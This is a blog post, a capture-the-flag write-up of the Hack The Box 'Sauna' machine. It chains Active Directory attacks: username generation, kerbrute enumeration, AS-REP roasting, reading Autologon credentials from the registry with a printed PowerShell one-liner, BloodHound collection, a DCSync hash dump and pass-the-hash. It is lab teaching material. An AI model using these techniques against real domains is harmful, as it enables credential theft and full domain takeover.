<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <link rel="stylesheet" type="text/css" href="/assets/css/print.css" media="print">
    <!--[if lt IE 9]>
    <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->

<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>HTB Writeup [Windows - Easy] - Sauna (AD Pentesting Track #2) | OmniSl4sh’s Blog</title>
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="HTB Writeup [Windows - Easy] - Sauna (AD Pentesting Track #2)" />
<meta property="og:locale" content="en_US" />
<link rel="canonical" href="https://omnisl4sh.github.io/2022/04/08/Sauna.html" />
<meta property="og:url" content="https://omnisl4sh.github.io/2022/04/08/Sauna.html" />
<meta property="og:site_name" content="OmniSl4sh’s Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-04-08T00:00:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="HTB Writeup [Windows - Easy] - Sauna (AD Pentesting Track #2)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-04-08T00:00:00+02:00","datePublished":"2022-04-08T00:00:00+02:00","headline":"HTB Writeup [Windows - Easy] - Sauna (AD Pentesting Track #2)","mainEntityOfPage":{"@type":"WebPage","@id":"https://omnisl4sh.github.io/2022/04/08/Sauna.html"},"url":"https://omnisl4sh.github.io/2022/04/08/Sauna.html"}</script>
<!-- End Jekyll SEO tag -->

    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->

  </head>

  <body>
    <div id="container">
      <div class="inner">
        <header>
          <h1><a href="https://omnisl4sh.github.io/">OmniSl4sh's Blog</a></h1>
          <h2></h2>
        </header>
        <!--<<section id="downloads" class="clearfix">
          
  
        </section>
        hr>-->
        <section id="main_content">
          <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">HTB Writeup [Windows - Easy] - Sauna (AD Pentesting Track #2)</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2022-04-08T00:00:00+02:00" itemprop="datePublished">Apr 8, 2022
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p><img src="/assets/Sauna/Sauna.png" alt="Sauna" /></p>

<h3 id="summary">Summary</h3>
<ul>
  <li>We find a <strong>domain controller</strong> with <strong>IIS</strong> running on port 80.</li>
  <li>It turns out to be the <strong>company website</strong> and we create a <strong>list of usernames</strong> from the <strong>‘Meet the Team’ page</strong>.</li>
  <li>We try <strong>ASREPRoasing</strong> and get <strong>creds for a user with PowerShell Remoting capabilities</strong>.</li>
  <li><em>Enumerating Autologon,</em> we find <strong>creds for another user</strong> with <strong>DCSync</strong> privileges which we use to <strong>dump all domain NTLM hashes</strong>.</li>
</ul>

<hr />

<h3 id="nmap">Nmap</h3>
<p>We start off with an <code class="language-plaintext highlighter-rouge">nmap</code> scan for <code class="language-plaintext highlighter-rouge">all ports</code> and using <code class="language-plaintext highlighter-rouge">service detection</code> and <code class="language-plaintext highlighter-rouge">default scripts</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-08 21:43:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-time: 
|   date: 2022-04-08T21:44:00
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
</code></pre></div></div>
<p><em>Right off the bat,</em> we see <code class="language-plaintext highlighter-rouge">IIS 10.0</code> on port 80 which indicates either Windows Server 2016 or 2019.
We also see a collection of ports (DNS, Kerberos, LDAP, SMB, Secure LDAP and WinRM) along with <code class="language-plaintext highlighter-rouge">nmap</code> telling us that this box is more likely a <strong>Domain Controller</strong>. The domain name is <code class="language-plaintext highlighter-rouge">EGOTISTICAL-BANK.LOCAL</code></p>

<h3 id="basic-osint-pulling-usernames-from-the-website-and-wordlist-generation">Basic OSINT: Pulling usernames from the website and Wordlist Generation</h3>

<p>we go and check out the website. And, we find mostly static content there that doesn’t give us much indication of an exploit. <em>However,</em> we do find a couple of potential usernames in the <code class="language-plaintext highlighter-rouge">/about.html</code> page at the bottom:</p>

<p><img src="/assets/Sauna/meet-the-team.jpg" alt="meet-the-team" /></p>

<p>we can use those to generate a wordlist to try against kerberos for user enumeration. <em>using a quick</em> <code class="language-plaintext highlighter-rouge">python</code> <em>script</em> (https://github.com/w0Tx/generate-ad-username), we generate a userlist like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...SNIP...
fergussmith
fergus-smith
fergus.smith
fersmi
fer-smi
fer.smi
fsmith
f-smith
f.smith
smithfergus
smith-fergus
smith.fergus
smifer
smi-fer
smi.fer
sfergus
s-fergus
s.fergus
smithf
smith-f
...SNIP...
</code></pre></div></div>

<p>this is based on <strong>commonly-used username schemes</strong>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NameSurname
Name.Surname
NamSur (3letters of each)
Nam.Sur
NSurname
N.Surname
SurnameName
Surname.Name
SurnameN
Surname.N
</code></pre></div></div>

<h3 id="user-enumeration-using-kerbrute">User Enumeration using <code class="language-plaintext highlighter-rouge">kerbrute</code></h3>

<p><em>using</em> <code class="language-plaintext highlighter-rouge">kerbrute</code> <em>for user enumeration,</em> we find that the user <code class="language-plaintext highlighter-rouge">fsmith</code> exists:</p>

<p><img src="/assets/Sauna/fsmith-exists.jpg" alt="fsmith-exists" /></p>

<h3 id="asreproast-attack">ASREPRoast Attack</h3>

<p><em>Having only this one user,</em> we decide to <code class="language-plaintext highlighter-rouge">ASREPRoast</code> him to see if he doesn’t have <code class="language-plaintext highlighter-rouge">Kerberos Pre-Authentication</code> enabled. And he does! :D</p>

<p><img src="/assets/Sauna/ASREP-roasted.jpg" alt="ASREP-roasted" /></p>

<p>we go on and crack the hash using <code class="language-plaintext highlighter-rouge">john</code>. The password turns out to be <code class="language-plaintext highlighter-rouge">Thestrokes23</code></p>

<p><img src="/assets/Sauna/fsmith-cracked.jpg" alt="fsmith-cracked" /></p>

<p>The wordlist I used <code class="language-plaintext highlighter-rouge">gegalist.txt</code> is just a combination of all the wordlists in <strong>Seclists</strong>.</p>

<h3 id="powershell-remoting-with-fsmith">PowerShell Remoting with <code class="language-plaintext highlighter-rouge">fsmith</code></h3>

<p>we want to get <strong>remote code execution</strong> on the box, so we try <strong>PowerShell Remoting</strong> using a tool called <code class="language-plaintext highlighter-rouge">evil-winrm</code> (https://github.com/Hackplayers/evil-winrm). And are lucky :D</p>

<p><img src="/assets/Sauna/we-can-winrm.jpg" alt="we-can-winrm" /></p>

<h3 id="autologon-creds-for-svc_loanmgr">Autologon creds for <code class="language-plaintext highlighter-rouge">svc_loanmgr</code></h3>

<p><em>Looking around the box in the user profile and in the root directory,</em> we don’t see much intersting information. <em>However, when we check for autlogon creds,</em> we do find interesting credentials for the <code class="language-plaintext highlighter-rouge">svc_loanmgr</code> user:</p>

<p>My <strong>PowerShell one-liner</strong>:</p>
<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">$Error</span><span class="n">ActionPreference</span><span class="o">=</span><span class="s1">'SilentlyContinue'</span><span class="p">;</span><span class="s1">'DefaultDomainName'</span><span class="p">,</span><span class="w"> </span><span class="s1">'DefaultUserName'</span><span class="p">,</span><span class="w"> </span><span class="s1">'DefaultPassword'</span><span class="p">,</span><span class="w"> </span><span class="s1">'AltDefaultDomainName'</span><span class="p">,</span><span class="w"> </span><span class="s1">'AltDefaultUserName'</span><span class="p">,</span><span class="w"> </span><span class="s1">'AltDefaultPassword'</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="p">{</span><span class="nv">$Val</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Get-ItemPropertyValue</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="s2">"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"</span><span class="w"> </span><span class="nt">-Name</span><span class="w"> </span><span class="bp">$_</span><span class="w"> </span><span class="p">;</span><span class="kr">if</span><span class="p">(</span><span class="nv">$Val</span><span class="p">){</span><span class="n">Write-Host</span><span class="w"> </span><span class="nt">-ForegroundColor</span><span class="w"> </span><span class="nx">Green</span><span class="w"> </span><span class="s2">"[+] </span><span class="bp">$_</span><span class="se">`:</span><span class="s2"> </span><span class="nv">$Val</span><span class="s2">"</span><span class="p">;</span><span class="w"> </span><span class="n">Clear-Variable</span><span class="w"> </span><span class="nx">Val</span><span class="p">}</span><span class="kr">else</span><span class="p">{</span><span class="n">Write-Host</span><span class="w"> </span><span class="s2">"[-] </span><span class="bp">$_</span><span class="se">`:</span><span class="s2"> Not found"</span><span class="p">}}</span><span class="w">
</span></code></pre></div></div>

<p><img src="/assets/Sauna/Autologon-creds.jpg" alt="Autologon-creds" /></p>

<p>This is amazing :D we now got two accounts!</p>

<h3 id="enumeration-with-bloodhound">Enumeration with <code class="language-plaintext highlighter-rouge">BloodHound</code></h3>

<p><em>Since this is an AD environment,</em> it’s only natural that we run <code class="language-plaintext highlighter-rouge">BloodHound</code>. <em>This time,</em> we’re going to use a python-based version called <code class="language-plaintext highlighter-rouge">bloodhound-python</code> (https://github.com/fox-it/BloodHound.py).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>└─# bloodhound-python -u fsmith@EGOTISTICAL-BANK.LOCAL -d EGOTISTICAL-BANK.LOCAL -v -c All
Password:
DEBUG: Resolved collection methods: dcom, objectprops, acl, trusts, session, localadmin, psremote, rdp, group
DEBUG: Using DNS to retrieve domain information
DEBUG: Querying domain controller information from DNS
DEBUG: Using domain hint: EGOTISTICAL-BANK.LOCAL
INFO: Found AD domain: egotistical-bank.local
DEBUG: Found primary DC: SAUNA.EGOTISTICAL-BANK.LOCAL
DEBUG: Found Global Catalog server: SAUNA.EGOTISTICAL-BANK.LOCAL
DEBUG: Using LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
DEBUG: Using base DN: DC=egotistical-bank,DC=local
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
DEBUG: Authenticating to LDAP server
DEBUG: No LAPS attributes found in schema
DEBUG: Found KeyCredentialLink attributes in schema
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
DEBUG: Writing users to file: 20220408174125_users.json
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
DEBUG: Authenticating to LDAP server
DEBUG: Querying resolver LDAP for SID S-1-5-21-2966785786-3096785034-1186376766-512
DEBUG: Querying resolver LDAP for SID S-1-5-21-2966785786-3096785034-1186376766-526
DEBUG: Querying resolver LDAP for SID S-1-5-21-2966785786-3096785034-1186376766-527
DEBUG: Querying resolver LDAP for SID S-1-5-21-2966785786-3096785034-1186376766-519
INFO: Found 7 users
DEBUG: Finished writing users
DEBUG: Writing groups to file: 20220408174125_groups.json
INFO: Connecting to GC LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
DEBUG: Authenticating to LDAP server
DEBUG: Querying GC for DN CN=Group Policy Creator Owners,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
DEBUG: Querying GC for DN CN=Domain Admins,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
DEBUG: Querying GC for DN CN=Cert Publishers,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
DEBUG: Querying GC for DN CN=Enterprise Admins,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
DEBUG: Querying GC for DN CN=Schema Admins,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
DEBUG: Querying GC for DN CN=Domain Controllers,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
DEBUG: Querying GC for DN CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
DEBUG: Querying GC for DN CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
DEBUG: Querying GC for DN CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
INFO: Found 52 groups
DEBUG: Finished writing groups
DEBUG: Opening file for writing: 20220408174125_domains.json
DEBUG: Querying resolver LDAP for SID S-1-5-21-2966785786-3096785034-1186376766-1108
DEBUG: Querying resolver LDAP for SID S-1-5-21-2966785786-3096785034-1186376766-498
DEBUG: Querying resolver LDAP for SID S-1-5-21-2966785786-3096785034-1186376766-516
INFO: Found 0 trusts
DEBUG: Finished writing domain info
INFO: Starting computer enumeration with 10 workers
DEBUG: Start working
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
DEBUG: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
DEBUG: Resolved: 10.10.10.175
DEBUG: Trying connecting to computer: SAUNA.EGOTISTICAL-BANK.LOCAL
DEBUG: DCE/RPC binding: ncacn_np:10.10.10.175[\PIPE\srvsvc]
DEBUG: Access denied while enumerating Sessions on SAUNA.EGOTISTICAL-BANK.LOCAL, likely a patched OS
DEBUG: DCE/RPC binding: ncacn_np:10.10.10.175[\PIPE\samr]
DEBUG: Opening domain handle
DEBUG: Found 544 SID: S-1-5-21-2966785786-3096785034-1186376766-500
DEBUG: Found 544 SID: S-1-5-21-2966785786-3096785034-1186376766-519
DEBUG: Sid is cached: ENTERPRISE ADMINS@EGOTISTICAL-BANK.LOCAL
DEBUG: Found 544 SID: S-1-5-21-2966785786-3096785034-1186376766-512
DEBUG: Sid is cached: DOMAIN ADMINS@EGOTISTICAL-BANK.LOCAL
DEBUG: DCE/RPC binding: ncacn_np:10.10.10.175[\PIPE\lsarpc]
DEBUG: Resolved SID to name: ADMINISTRATOR@EGOTISTICAL-BANK.LOCAL
DEBUG: DCE/RPC binding: ncacn_np:10.10.10.175[\PIPE\samr]
DEBUG: Opening domain handle
DEBUG: DCE/RPC binding: ncacn_np:10.10.10.175[\PIPE\samr]
DEBUG: Opening domain handle
DEBUG: DCE/RPC binding: ncacn_np:10.10.10.175[\PIPE\samr]
DEBUG: Opening domain handle
DEBUG: Found 580 SID: S-1-5-21-2966785786-3096785034-1186376766-1105
DEBUG: Found 580 SID: S-1-5-21-2966785786-3096785034-1186376766-1108
DEBUG: Sid is cached: SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL
DEBUG: DCE/RPC binding: ncacn_np:10.10.10.175[\PIPE\lsarpc]
DEBUG: Resolved SID to name: FSMITH@EGOTISTICAL-BANK.LOCAL
DEBUG: Write worker obtained a None value, exiting
DEBUG: Write worker is done, closing files
INFO: Done in 00M 28S
</code></pre></div></div>
<p>this leaves us a couple of <code class="language-plaintext highlighter-rouge">.json</code> files which we can zip before uploading to <code class="language-plaintext highlighter-rouge">bloodhound</code></p>

<p><img src="/assets/Sauna/Zipping-them-jsons.jpg" alt="Zipping-them-jsons" /></p>

<h3 id="abusing-dangerous-rights-dcsync">Abusing Dangerous Rights (DCSync)</h3>

<p><em>trying a standard</em> <code class="language-plaintext highlighter-rouge">bloodhound</code> <em>query,</em> we find that the user that own <code class="language-plaintext highlighter-rouge">svc_loanmgr</code> happens to have a very dangerous right <code class="language-plaintext highlighter-rouge">DCSync</code> on the domain.</p>

<p><img src="/assets/Sauna/dc-sync-for-loanmgr.jpg" alt="dc-sync-for-loanmgr" /></p>

<p>Having this right means we can act as if we were <em>another domain controller</em> and ask for a <strong>full synchronization of all the password hashes of the domain.</strong></p>

<h3 id="full-domain-hash-dump">Full domain hash dump</h3>

<p>This can be achieved using <code class="language-plaintext highlighter-rouge">impacket</code>’s <code class="language-plaintext highlighter-rouge">secretsdump.py</code> tool:</p>

<p><img src="/assets/Sauna/secrets-dump.jpg" alt="secrets-dump" /></p>

<p><em>With the</em> <code class="language-plaintext highlighter-rouge">administrator</code>‘<em>s hash,</em> we can easily get a shell on the box using <code class="language-plaintext highlighter-rouge">evil-winrm</code>’s <code class="language-plaintext highlighter-rouge">-H</code> flag to run what’s called a <code class="language-plaintext highlighter-rouge">pass-the-hash</code> attack.</p>

<p><img src="/assets/Sauna/got-admin.jpg" alt="got-admin" /></p>

  </div><a class="u-url" href="/2022/04/08/Sauna.html" hidden></a>
</article>

        </section>

        <footer>
        
          This page was generated by <a href="https://pages.github.com">GitHub Pages</a>.
        </footer>

      </div>
    </div>
  </body>
</html>